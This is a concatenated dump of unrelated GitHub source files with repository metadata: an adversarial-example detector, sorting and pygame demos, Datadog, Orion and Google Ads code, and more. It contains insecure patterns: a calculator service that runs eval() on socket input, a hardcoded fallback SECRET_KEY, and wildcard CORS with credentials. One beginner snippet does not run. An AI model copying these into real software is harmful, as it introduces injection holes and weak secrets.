print('Picture Decoded')
prediction = get_prediction(image_bytes=picture.content)
print(prediction)
print('Disposition:', picture.headers[b'Content-Disposition'])
filename = picture.headers[b'Content-Disposition'].decode().split(';')[1].split('=')[1]
print('filename:',filename)
if len(filename) < 4:
filename=picture.headers[b'Content-Disposition'].decode().split(';')[2].split('=')[1]
print('Inside if')
return{
"statusCode":200,
"headers": {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True
},
"body" : json.dumps({'file':filename.replace('"',''), 'predicted': prediction})
}
except Exception as e:
print('Entering exception')
print(repr(e))
return{
"statusCode":500,
"headers": {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Credentials': True
},
"body" : json.dumps({"error":repr(e)})
}
|
[
"noreply@github.com"
] |
pranavpandey2511.noreply@github.com
|
3cabf5589b831a4fbf0fd405ef5e4af61faf027f
|
3d5e86cb6cc01729170d5d445f958354f72c1462
|
/code/ae-with-svm.py
|
ad9728c56a9e4f773ddc89c9ec683f9dbf36c0e2
|
[] |
no_license
|
ianchen88/attack-agnostic-adversarial-attack-detection
|
32e20624a4b63cc454912865915c2bd1fcdda247
|
8df0a700300986ae7962c14cef7e60a811b03b8f
|
refs/heads/master
| 2023-02-14T02:00:02.062950
| 2021-01-11T14:41:29
| 2021-01-11T14:41:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,554
|
py
|
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
import visdom
from ShapDataset import ShapDatasetTop
# Ignore warnings from sklearn
import warnings
warnings.filterwarnings("ignore")
from sklearn.model_selection import StratifiedShuffleSplit, GridSearchCV
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.svm import SVC
from sklearn import preprocessing
import argparse
from utils import AverageMeter, VisdomLinePlotter, LogisticRegression, train_logistic_regression_epoch, \
test_logistic_regression_epoch, ReconErrorDataset
import numpy as np
import pandas as pd
import pickle
import random
import math
import tqdm
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('normal_path', help='Location to saved normal SHAP values', type=str)
arg_parser.add_argument('adversarial_path', help='Location to saved adversarial SHAP values', type=str)
arg_parser.add_argument('--plot', help='Name of visdom plot', type=str, default='ae_with_svm')
arg_parser.add_argument('--batch_size', type=int, default=128, metavar='N',
help='input batch size for training (default: 128)')
arg_parser.add_argument('--epochs', type=int, default=100, metavar='N', help='number of epochs to train (default: 100)')
arg_parser.add_argument('--svm', help='Use SVM on reconstruction error (else use LR)', action='store_true')
arg_parser.add_argument('--save', help='Location to save model to', type=str, default=None)
arg_parser.add_argument('--load', help='Location to load model from', type=str, default=None)
arg_parser.add_argument('--save_recon_error', help='Location to save reconstruction errors to', type=str, default=None)
arg_parser.add_argument('--save_svm', help='Location to save recon. err. SVM to', type=str, default=None)
arg_parser.add_argument('--n_jobs', help='Number of parallel instances for grid search', type=int, default=None)
args = arg_parser.parse_args()
print('=================== Loading dataset')
dataset = ShapDatasetTop(args.normal_path, args.adversarial_path, normal_only=True, normalise=True)
dataset_all = ShapDatasetTop(args.normal_path, args.adversarial_path, normal_only=False, normalise=True)
# Get adversarial samples only, bit of a cheat way
adv_samples = pd.DataFrame(dataset_all.adversarial)
adv_samples = adv_samples.fillna(0)
normal_samples = pd.DataFrame(dataset.normal)
normal_samples = normal_samples.fillna(0)
global plotter
plotter = VisdomLinePlotter(args.plot)
# https://docs.microsoft.com/en-us/archive/msdn-magazine/2019/april/test-run-neural-anomaly-detection-using-pytorch
class Autoencoder(nn.Module):
def __init__(self):
super(Autoencoder, self).__init__()
self.l1 = nn.Linear(100, 50)
self.l2 = nn.Linear(50, 25)
self.l3 = nn.Linear(25, 50)
self.l4 = nn.Linear(50, 100)
def forward(self, x):
z = torch.tanh(self.l1(x))
z = torch.tanh(self.l2(z))
z = torch.tanh(self.l3(z))
z = torch.tanh(self.l4(z))
return z
class AutoencoderTest(nn.Module):
def __init__(self):
super(AutoencoderTest, self).__init__()
self.e1 = nn.Linear(100, 80)
self.e2 = nn.Linear(80, 20)
self.d1 = nn.Linear(20, 80)
self.d2 = nn.Linear(80, 100)
def forward(self, x):
x = F.relu(self.e1(x))
x = F.relu(self.e2(x))
x = F.relu(self.d1(x))
x = F.relu(self.d2(x))
return x
class ConvAutoencoder(nn.Module):
def __init__(self):
super(ConvAutoencoder, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 5)
self.conv2 = nn.Conv2d(16, 4, 5)
self.pool = nn.MaxPool2d(2, 2)
self.t_conv1 = nn.ConvTranspose2d(4, 16, 2, stride=2)
self.t_conv2 = nn.ConvTranspose2d(16, 3, 2, stride=2)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.pool(x)
x = F.relu((self.conv2(x)))
x = self.pool(x)
x = F.relu(self.t_conv1(x))
x = F.relu((self.t_conv2(x)))
return x
model = AutoencoderTest()
#model = ConvAutoencoder()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("======================= Using device:", device)
model = model.to(device)
opt = optim.Adam(model.parameters(), lr=0.01)
print("====================== Loading data")
# Randomly create training and validation datasets (for now)
train_size = int(0.8 * len(dataset))
val_size = len(dataset) - train_size
indices = list(range(len(dataset)))
np.random.shuffle(indices)
train_indices, val_indices = indices[:train_size], indices[train_size:]
train_sampler = torch.utils.data.sampler.SubsetRandomSampler(train_indices)
val_sampler = torch.utils.data.sampler.SubsetRandomSampler(val_indices)
batch_size = args.batch_size
epochs = args.epochs
train_loader = DataLoader(dataset, batch_size=batch_size, sampler=train_sampler)
test_loader = DataLoader(dataset, batch_size=1, sampler=val_sampler)
model = model.train()
model = model.double()
loss = nn.MSELoss()
#loss = nn.L1Loss()
# No need to train if we're loading a model
if args.load is None:
losses = AverageMeter()
for epoch in range(epochs):
for data, labels in train_loader:
data = data.requires_grad_()
data = data.to(device)
labels = labels.to(device)
opt.zero_grad()
output = model(data)
loss_obj = loss(output, data)
loss_obj.backward()
opt.step()
losses.update(loss_obj.data, len(data))
plotter.plot('loss-ae', 'train', 'Class Loss', epoch, losses.avg.cpu())
print('Epoch {} loss: {}'.format(epoch, losses.avg.cpu()))
if args.save is not None:
with open(args.save, 'wb') as f:
torch.save(model, f)
else:
with open(args.load, 'rb') as f:
model = torch.load(f)
model = model.eval()
print('====================== Calculating final reconstruction loss for all train data')
# Get the normal and adv. samples from our train data
dataloader = DataLoader(dataset_all, batch_size=1)
all_train_recon_errors = []
all_train_labels = []
with tqdm.tqdm(total=len(dataloader)) as progress:
for inputs, labels in dataloader:
inputs = inputs.to(device)
output = model(inputs)
error = torch.mean((inputs[0] - output[0]) * (inputs[0] - output[0]))
all_train_recon_errors.append(error.data.item())
all_train_labels.append(labels[0].data.item())
progress.update(1)
# Make the errors into a pandas dataframe so we can easily feed it into an SVM
error_df = pd.DataFrame(all_train_recon_errors)
error_labels_df = pd.DataFrame(all_train_labels)
# Because we have such imabalanced classes, we need more adv. samples so that we don't just classify all normal samples
# Correctly and be done with it
# This isn't the best way to do this, but for now we will see if it works
num_normal = len(error_labels_df[error_labels_df[0] == 0])
num_adv = len(error_labels_df[error_labels_df[0] == 1])
# How many times do we have to repeat the adv. set to get around the same number of samples?
repeat = int(num_normal / num_adv)
# Get the adv. samples
locs = error_labels_df.index[error_labels_df[0] == 1].tolist()
adv_samples = error_df.loc[locs]
for i in range(repeat):
error_df = error_df.append(adv_samples, ignore_index=True)
error_labels_df = error_labels_df.append(error_labels_df.loc[locs], ignore_index=True)
err_dataset = ReconErrorDataset(error_df, error_labels_df)
if not args.svm:
print('====================== Training Logistic Regression on reconstruction errors')
train_size = int(0.8 * len(err_dataset))
val_size = len(err_dataset) - train_size
indices = list(range(len(err_dataset)))
np.random.shuffle(indices)
train_indices, val_indices = indices[:train_size], indices[train_size:]
train_sampler = torch.utils.data.sampler.SubsetRandomSampler(train_indices)
val_sampler = torch.utils.data.sampler.SubsetRandomSampler(val_indices)
err_train_loader = DataLoader(err_dataset, batch_size=32, sampler=train_sampler)
err_val_loader = DataLoader(err_dataset, batch_size=1, sampler=val_sampler)
model = LogisticRegression(1, 1)
model = model.double()
model = model.to(device)
loss = nn.BCELoss()
opt = optim.SGD(model.parameters(), 0.001)
best = 0
for epoch in range(100):
train_logistic_regression_epoch(model, loss, opt, err_train_loader, plotter, device, epoch)
acc = test_logistic_regression_epoch(model, err_val_loader, loss, plotter, device, epoch)
best = max(acc, best)
print('** Validation: %f (best) - %f (current)' % (best, acc))
else:
print('====================== Training SVM on reconstruction errors')
sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2)
split = sss.split(error_df, error_labels_df)
for train_indices, test_indices in split:
data_train, labels_train = error_df.iloc[train_indices], error_labels_df.iloc[train_indices]
data_test, labels_test = error_df.iloc[test_indices], error_labels_df.iloc[test_indices]
data_train = preprocessing.scale(data_train)
data_test = preprocessing.scale(data_test)
# Hyperparameters we want to search over
param_grid = [{'kernel': ['linear'], 'C': [0.1, 1.0, 10, 100], 'shrinking': [True]},
{'kernel': ['rbf'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'shrinking': [True]},
{'kernel': ['poly'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'degree': [2, 3, 4], 'shrinking': [True]},
{'kernel': ['sigmoid'], 'C': [0.1, 1.0, 10, 100], 'gamma': ['scale', 'auto', 1, 0.1, 0.01],
'shrinking': [True]}]
grid = GridSearchCV(SVC(), param_grid, refit=True, verbose=2, n_jobs=args.n_jobs)
grid.fit(data_train, labels_train.values.ravel())
#svm = SVC(kernel='rbf', shrinking=True)
#svm.fit(data_train, labels_train)
print('====================== SVM trained')
print('====================== Best parameters found were:\n')
print(grid.best_params_)
if args.save_svm is not None:
print('====================== Saving SVM to {}'.format(args.save_svm))
with open(args.save_svm, 'wb') as f:
pickle.dump(grid, f)
print('====================== SVM saved')
# Try going through a test set and seeing if we can find the adv. samples
normal_correct = 0
adv_correct = 0
normal_total = 0
adv_total = 0
print('====================== Testing SVM')
with tqdm.tqdm(total=len(data_test)) as progress:
for i in range(len(data_test)):
error = data_test[i]
label = labels_test.iloc[i].values[0]
pred = grid.predict([error])
print('Error of sample was {}, label of sample was {}, predicted label was {}'.format(error,
label,
pred[0]))
if pred[0] == 1:
adv = True
else:
adv = False
if label == 1:
if adv:
adv_correct += 1
adv_total += 1
else:
if not adv:
normal_correct += 1
normal_total += 1
progress.update(1)
print('Acc. on normal data: {}\nAcc. on adv. data: {}'.format(normal_correct / normal_total,
adv_correct / adv_total))
preds = grid.predict(data_test)
conf_matrix = confusion_matrix(labels_test, preds).tolist()
class_report = classification_report(labels_test, preds)
results = "{} \n\n {}".format(conf_matrix, class_report)
print(results)
"""max_error = 0
# Go through test data, find largest error
for data, labels in test_loader:
data = data.to(device)
labels = labels.to(device)
output = model(data)
for j in range(len(output)):
error = torch.sum((data[j] - output[j]) * (data[j] - output[j]))
if error > max_error:
max_error = error
print('Found max error at index {}'.format(j))"""
|
[
"matthew.s.watson@durham.ac.uk"
] |
matthew.s.watson@durham.ac.uk
|
968c2f037dcf0c1535623c94568e21ba2eca4b62
|
dfcbc222a2ff47577a5afa6c987bf10f7a098444
|
/Algorithms/mergeSort.py
|
9c6487a09c6bc44cf0ec7017ce6a5f82fcef425b
|
[] |
no_license
|
AshDev07/Sorting-Algorithm-Visualizer
|
eb71b30076493ca591271b34024fa27dff4911eb
|
14300f391a393942cd43d46c7f391a1cc3664b6f
|
refs/heads/master
| 2023-06-15T10:36:59.380842
| 2021-07-16T05:18:29
| 2021-07-16T05:18:29
| 386,516,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,107
|
py
|
import time
from colors import *
def merge(data, start, mid, end, drawData, timeTick):
p = start
q = mid + 1
tempArray = []
for i in range(start, end + 1):
if p > mid:
tempArray.append(data[q])
q += 1
elif q > end:
tempArray.append(data[p])
p += 1
elif data[p] < data[q]:
tempArray.append(data[p])
p += 1
else:
tempArray.append(data[q])
q += 1
for p in range(len(tempArray)):
data[start] = tempArray[p]
start += 1
def merge_sort(data, start, end, drawData, timeTick):
if start < end:
mid = int((start + end) / 2)
merge_sort(data, start, mid, drawData, timeTick)
merge_sort(data, mid + 1, end, drawData, timeTick)
merge(data, start, mid, end, drawData, timeTick)
drawData(data, [PURPLE if start <= x < mid else YELLOW if x == mid
else DARK_BLUE if mid < x <= end else BLUE for x in range(len(data))])
time.sleep(timeTick)
drawData(data, [BLUE for x in range(len(data))])
|
[
"ashdev420@gmail.com"
] |
ashdev420@gmail.com
|
032a7ceb5003e13ea27838cbb1ddebe1a067b09b
|
5570482103d38e396ca9c279aeaa5026294bb6e8
|
/mapcampus/campusuh/campusuhapp/templatetags/my_filters.py
|
5885dcb6ccb8866bcac23fff9f23b02f8ef8b4af
|
[] |
no_license
|
jchilela/mapcampus
|
0719bf235d889813f8855839ec5fa43113b2039a
|
348e8d6d1187c1f93e8905070c1b4873d2d812a6
|
refs/heads/master
| 2021-01-10T08:59:28.112116
| 2016-01-22T21:43:48
| 2016-01-22T21:43:48
| 43,837,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django import template
register = template.Library()
@register.filter(name='times')
def times(number):
return range(number)
|
[
"juliogabrielchilela1@MacBook-Pro-de-Julio.local"
] |
juliogabrielchilela1@MacBook-Pro-de-Julio.local
|
f3b66dd18e7b1ad969e37992945448218ff06c52
|
c117e905ac5f1938da3c8e23845ad52cc922923a
|
/src/orion/testing/dummy_algo.py
|
a506d3f2ce928d707c48ca086fd7b0bb315a602b
|
[
"BSD-3-Clause"
] |
permissive
|
Epistimio/orion
|
2850983dd7ac0a417d451d39b2dc7a652f1920c8
|
2944875eff03b86138d6780df4b1dd6dc8158ccb
|
refs/heads/develop
| 2023-09-01T20:36:59.279966
| 2023-08-21T13:25:43
| 2023-08-21T13:25:43
| 102,697,867
| 218
| 41
|
NOASSERTION
| 2023-08-21T12:51:55
| 2017-09-07T06:05:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,274
|
py
|
"""A dummy algorithm used for unit tests."""
from __future__ import annotations
from typing import ClassVar, Sequence
from orion.algo.base import BaseAlgorithm
from orion.algo.space import Space
from orion.core.worker.trial import Trial
class FixedSuggestionAlgo(BaseAlgorithm):
"""A dumb algo that always returns the same trial."""
requires_type: ClassVar[str | None] = "real"
requires_shape: ClassVar[str | None] = "flattened"
requires_dist: ClassVar[str | None] = "linear"
def __init__(
self,
space: Space,
fixed_suggestion: Trial | None = None,
seed: int | Sequence[int] | None = None,
):
super().__init__(space)
self.seed = seed
self.fixed_suggestion = fixed_suggestion or space.sample(1, seed=seed)[0]
assert self.fixed_suggestion in space
def suggest(self, num):
# NOTE: can't register the trial if it's already here. The fixed suggestion is always "new",
# but the algorithm actually observes it at some point. Therefore, we don't overwrite what's
# already in the registry.
if not self.has_suggested(self.fixed_suggestion):
self.register(self.fixed_suggestion)
return [self.fixed_suggestion]
return []
|
[
"noreply@github.com"
] |
Epistimio.noreply@github.com
|
f3a4db1d6675424c9492749e73ee9c8f7c2fba7a
|
3b7a061e406e072de15af4e92216b4800da0edba
|
/arquivo.py
|
ca910db9ad7cf626f990f1a7ed32e78b9b8ce7b9
|
[] |
no_license
|
juliakastrup/1stG
|
45df5278f441f2fab88324282225003f8f18c7af
|
57a08eec627ddd860f3e5ba1785f9f51c87976c3
|
refs/heads/master
| 2021-09-23T22:33:19.845219
| 2018-09-28T14:23:09
| 2018-09-28T14:23:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
num1=234
num2=7869
if num1>num2:
print('Sim, {num1} é maior que {num2}!'.format(num1=num1,num2=num2))
else:
print('Não, {num1} não é maior que {num2}!'.format(num1=num1,num2=num2))
name='if'
Paulo name=='Angela':
print('Hey, Angela!')
elif name=='Julia':
print('Hey, Julia!')
elif name=='Paulo':
print('Hey, Paulo!')
elif name=='Bernardo':
print('Hey, Bernardo!')
else:
print('Hey, esquisito!')
|
[
"jkastrupb@gmail.com"
] |
jkastrupb@gmail.com
|
717927f5abd794acc318f554bc19ae9d85c66dd1
|
a58a2dee264e11eaf0397f054545156871eafb4d
|
/services/calc.py
|
695be6ab14159754c464ef80f517c638de23821e
|
[] |
no_license
|
bewakes/assistant
|
b157c7ead508a5a490d19cfe2fd479a4d0562304
|
ff336866a19b7b8c8cd971e340812b8d7c865af1
|
refs/heads/master
| 2022-12-10T04:24:18.230269
| 2020-04-28T15:41:54
| 2020-04-28T15:41:54
| 92,492,350
| 3
| 1
| null | 2021-06-01T23:24:07
| 2017-05-26T09:00:27
|
Python
|
UTF-8
|
Python
| false
| false
| 811
|
py
|
import sys
import os
import traceback
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utils.socket_mixin import SocketHandlerMixin # noqa
from utils import log # noqa
from utils.terminal_formatter import Style
logger = log.get_logger('Calculator service')
class Calculator(SocketHandlerMixin):
def __init__(self):
super().__init__()
def handle_calc(self, args):
expression = ''.join(args)
try:
return Style.green(str(eval(expression)))
except Exception as e:
return Style.red(str(e))
if __name__ == '__main__':
c = Calculator()
port = sys.argv[1]
try:
c.initialize_and_run(port)
except SystemExit:
pass
except Exception:
logger.error(traceback.format_exc())
|
[
"spirit_bibek@yahoo.com"
] |
spirit_bibek@yahoo.com
|
017c7642c90d6d18f5006df5ea73ea024724ee0a
|
1f56449c4003dcbe968a5c0c58b9444a80d8ad7a
|
/config.py
|
ec1becb0182eeba911bef9837a311f8d48d69a9a
|
[] |
no_license
|
kevinbsilva/flask_app
|
0b311b8cdee5ffbadeefbaf5bb646128d1affabe
|
7a28103baca0a3a88910b28ddb730e3d042fd0ca
|
refs/heads/master
| 2023-02-15T04:07:31.790010
| 2020-12-29T02:27:37
| 2020-12-29T02:27:37
| 325,145,995
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
MYSQL_DATABASE_URI = os.environ.get('DATABASE_URL') or 'mysql://{host}:{port}/{db_name}'.format(host='localhost', port='3306', db_name='flask')
MYSQL_TRACK_MODIFICATIONS = False
|
[
"kevinbarranco.silva@outlook.com"
] |
kevinbarranco.silva@outlook.com
|
6d00b32fd8ad012ae7a155e43f412b5cf8570a59
|
e24c66c8ed326f3486c053c25644cb2b183efe9c
|
/card_example/src/screens/screens/language_screen.py
|
2f72238aaf25ad7dcae3fcaaeafdb04bedbecd3f
|
[
"MIT"
] |
permissive
|
jldj1/card-example
|
7f87a0b335ee6a80fa0ccce16af3aecdf8a8e592
|
bf2b4519e7ee67d3f8e03a50fcdb4b003c535bea
|
refs/heads/main
| 2023-08-28T04:17:18.185896
| 2021-10-29T02:27:16
| 2021-10-29T02:27:16
| 422,416,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,320
|
py
|
import pygame, sys
from buttons.button import Button
from screens.blank_screen2 import Blank2
BG_COLOR = (30, 30, 30)
BLACK_COLOR = (0, 0, 0)
class LanguageSelect:
def __init__(self):
self.width = 600
self.height = 600
self.setup_screen()
self.click = False
self.running = True
# self, screen, x, y, width, height, text="", color=(DARK_GREY)
self.button = Button(self.screen, self.width // 2 - 100, self.height // 2 - 25, 200, 50, "English",
BLACK_COLOR)
self.button2 = Button(self.screen, self.width // 2 - 100, self.height // 2 - 75, 200, 50, "Spanish",
BLACK_COLOR)
self.clock = pygame.time.Clock()
self.language = "English"
def draw(self):
self.screen.fill(BG_COLOR)
# screen.fill always in beggining of draw func
self.button.draw()
self.button2.draw()
# display.update() always in end of draw func
pygame.display.update()
def getLanguage(self):
return self.language
def setup_screen(self):
self.screen = pygame.display.set_mode((self.width, self.height))
pygame.display.set_caption("Blank Template Screen")
def run(self):
while self.running:
pos = pygame.mouse.get_pos()
print(self.language)
self.draw()
if self.button.collides(pos):
if self.click:
print("ENGLISH SELECTED")
self.language = "English"
if self.button2.collides(pos):
if self.click:
print("ESPANOL EELCTED")
self.language = "Spanish"
self.click = False
for event in pygame.event.get():
self.handle_event(event)
self.clock.tick(60)
def handle_event(self, event):
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
self.click = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.running = False
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
|
[
"noreply@github.com"
] |
jldj1.noreply@github.com
|
b1c7e207adef48e14d64798fda3b81db8f9a18dc
|
dba617daf7ce09394c703d52054583d9a11084a3
|
/datadog_checks_dev/datadog_checks/dev/tooling/commands/release/build.py
|
9e45dda5fcc84926ae851302a54fc959619157a1
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
cirocosta/integrations-core
|
8bb43bca28498df410d2bab4a482eadf81954622
|
86c5e1caabaed489b19dc5cb172545fda9b99ee7
|
refs/heads/master
| 2020-12-05T12:55:19.928373
| 2020-01-06T13:37:25
| 2020-01-06T13:37:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import click
from ....utils import basepath, dir_exists, remove_path, resolve_path
from ...constants import get_root
from ...release import build_package
from ...utils import get_valid_checks
from ..console import CONTEXT_SETTINGS, abort, echo_info, echo_success, echo_waiting
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Build a wheel for a check')
@click.argument('check')
@click.option('--sdist', '-s', is_flag=True)
def build(check, sdist):
"""Build a wheel for a check as it is on the repo HEAD"""
if check in get_valid_checks():
check_dir = os.path.join(get_root(), check)
else:
check_dir = resolve_path(check)
if not dir_exists(check_dir):
abort('`{}` is not an Agent-based Integration or Python package'.format(check))
check = basepath(check_dir)
echo_waiting('Building `{}`...'.format(check))
dist_dir = os.path.join(check_dir, 'dist')
remove_path(dist_dir)
result = build_package(check_dir, sdist)
if result.code != 0:
abort(result.stdout, result.code)
echo_info('Build done, artifact(s) in: {}'.format(dist_dir))
echo_success('Success!')
|
[
"ofekmeister@gmail.com"
] |
ofekmeister@gmail.com
|
097dd9b342883a56dff4f606f3bae72c1bc304fb
|
7106ddc566b6fe2e96733414801d37566e51a0b7
|
/miscellaneous/pesel.py
|
d9cfa6ae2e894b24c6bb6a46f4b647fecd3caf62
|
[] |
no_license
|
tomelisse/PythonEx
|
11c4602b42af79adadde9a7008b8fad35f2d4c5a
|
b57773ce8d46079533ce009d92f73b7b936d3722
|
refs/heads/master
| 2021-01-02T22:57:02.947092
| 2017-08-18T15:40:02
| 2017-08-18T15:40:02
| 99,430,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from datetime import date
from textwrap import wrap
def sex(n):
''' returns the sex of a person based on pesel '''
print(n)
return 'M' if n%2 else 'F'
def list_to_int(l):
''' age helper converting list of len =2 to an int '''
return 10*l[0] + l[1]
def age(birth):
''' returns the age of a person based on pesel '''
year = list_to_int(birth[:2])
month = list_to_int(birth[2:4])
day = list_to_int(birth[4:6])
if month < 13:
year = 1900 + year
elif month < 33:
year = 2000 + year
month -= 20
elif month > 80:
year = 1800 + year
month -= 80
birth = date(year, month, day)
today = date.today()
return (today-birth).days//365
def pesel():
''' returns age and sex based on pesel '''
pesel = list(map(int, wrap(input(), 1)))
a = age(pesel[:6])
s = sex(pesel[9])
return a, s
if __name__ == '__main__':
print(pesel())
|
[
"tomelisse@gmail.com"
] |
tomelisse@gmail.com
|
203d43211c5a1f7a559eca0099e46670a3c1d422
|
33496338a35c4f76eadec13dc56c7831b1896113
|
/Plugins/MadaraLibrary/Source/ThirdParty/madara/maal/maal_monitor.py
|
d76607bf7d70d60435d2183f254f6e2145936afe
|
[
"BSD-2-Clause"
] |
permissive
|
jredmondson/GamsPlugins
|
1ce0c2301cf84b6398ae1a2a6cdef9a4d0c1992c
|
d133f86c263997a55f11b3b3d3344faeee60d726
|
refs/heads/master
| 2021-07-08T23:40:48.423530
| 2020-10-01T05:31:26
| 2020-10-01T05:31:26
| 196,622,579
| 3
| 1
|
BSD-2-Clause
| 2020-03-17T04:23:21
| 2019-07-12T17:54:49
|
C++
|
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
#!/usr/bin/env python
## @package maal_monitor
# monitors CPU and Memory usage on an Android smartphone. Does not require monkeyrunner
# "python maal_monitor.py --help" to see available parameters.
# Imports os and system modules which we need to import Ammo scripts
import os
import sys
# Import the Ammo script library
sys.path.append(os.path.dirname(sys.argv[0]))
import maal
from optparse import OptionParser
# command line arguments
def main ():
parser = OptionParser (add_help_option=False)
parser.add_option ("--period", "--frequency", dest="period",
default=5,
help="Period of time to wait between polling for stats",
type='int')
parser.add_option ("--killtime", "--runtime", "--timeout", dest="killtime",
default=120,
help="Total time to monitor the device stats",
type='int')
parser.add_option ("--processes", "-p", dest="processes",
default=5,
help="Number of processes to display in the long format",
type='int')
parser.add_option ("--iters", "-i", "-n", dest="iters",
default=-1,
help="Optional way to specify iterations",
type='int')
parser.add_option ("-s", "--simplified", dest="simplified", default=None,
help="show a simplified output",
action='store_true')
parser.add_option ("--device", "--serial", dest="device", default=None,
help="The Android serial number for the device to call",
action='store')
parser.add_option("--outfile", "--file", dest="outfile", default=None,
help="filename to save stats to (default is stdout)",
action='store')
parser.add_option("--logcat", dest="logcat", default=None,
help="filename redirect logcat output to",
action='store')
parser.add_option("--clearlog", "--purgelog", "--flushlog", dest="clearlog", default=None,
help="clearing out the content of the log files",
action='store_true')
parser.add_option ("-h", "--help", dest="help", default=None,
help="show usage information for this script",
action='store_true')
# options can be used with options.{dest}. Args is a list of all
# unused command line arguments
(options, args) = parser.parse_args ()
if options.help:
parser.print_help ()
sys.exit (3)
# clear logcat if the user request a logcat
if options.clearlog:
maal.logcat (options.device, flush=True)
stats_file = None
if options.outfile:
stats_file = open (options.outfile, 'w')
num_attempts = options.killtime / options.period
if options.iters > 0:
num_attempts = options.iters
for n in range (num_attempts):
maal.print_device_stats (options.device, stats_file,
options.simplified, options.processes)
if n != num_attempts - 1:
maal.sleep (options.period)
if options.outfile:
stats_file.close ()
# save logs to the filename specified in --logcat
if options.logcat:
maal.logcat (options.device, file=options.logcat)
if __name__ == "__main__":
main()
|
[
"jedmondson@gmail.com"
] |
jedmondson@gmail.com
|
f9324212a0958b78f27b02d6267ce06f0db9fcec
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/services/types/ad_group_service.py
|
09d6d7c972bdf1313bb68c51d5ca5af90fc14eda
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,936
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v6.enums.types import response_content_type as gage_response_content_type
from google.ads.googleads.v6.resources.types import ad_group as gagr_ad_group
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
from google.rpc import status_pb2 as status # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.services',
marshal='google.ads.googleads.v6',
manifest={
'GetAdGroupRequest',
'MutateAdGroupsRequest',
'AdGroupOperation',
'MutateAdGroupsResponse',
'MutateAdGroupResult',
},
)
class GetAdGroupRequest(proto.Message):
r"""Request message for
[AdGroupService.GetAdGroup][google.ads.googleads.v6.services.AdGroupService.GetAdGroup].
Attributes:
resource_name (str):
Required. The resource name of the ad group
to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
class MutateAdGroupsRequest(proto.Message):
r"""Request message for
[AdGroupService.MutateAdGroups][google.ads.googleads.v6.services.AdGroupService.MutateAdGroups].
Attributes:
customer_id (str):
Required. The ID of the customer whose ad
groups are being modified.
operations (Sequence[google.ads.googleads.v6.services.types.AdGroupOperation]):
Required. The list of operations to perform
on individual ad groups.
partial_failure (bool):
If true, successful operations will be
carried out and invalid operations will return
errors. If false, all operations will be carried
out in one transaction if and only if they are
all valid. Default is false.
validate_only (bool):
If true, the request is validated but not
executed. Only errors are returned, not results.
response_content_type (google.ads.googleads.v6.enums.types.ResponseContentTypeEnum.ResponseContentType):
The response content type setting. Determines
whether the mutable resource or just the
resource name should be returned post mutation.
"""
customer_id = proto.Field(proto.STRING, number=1)
operations = proto.RepeatedField(proto.MESSAGE, number=2,
message='AdGroupOperation',
)
partial_failure = proto.Field(proto.BOOL, number=3)
validate_only = proto.Field(proto.BOOL, number=4)
response_content_type = proto.Field(proto.ENUM, number=5,
enum=gage_response_content_type.ResponseContentTypeEnum.ResponseContentType,
)
class AdGroupOperation(proto.Message):
r"""A single operation (create, update, remove) on an ad group.
Attributes:
update_mask (google.protobuf.field_mask_pb2.FieldMask):
FieldMask that determines which resource
fields are modified in an update.
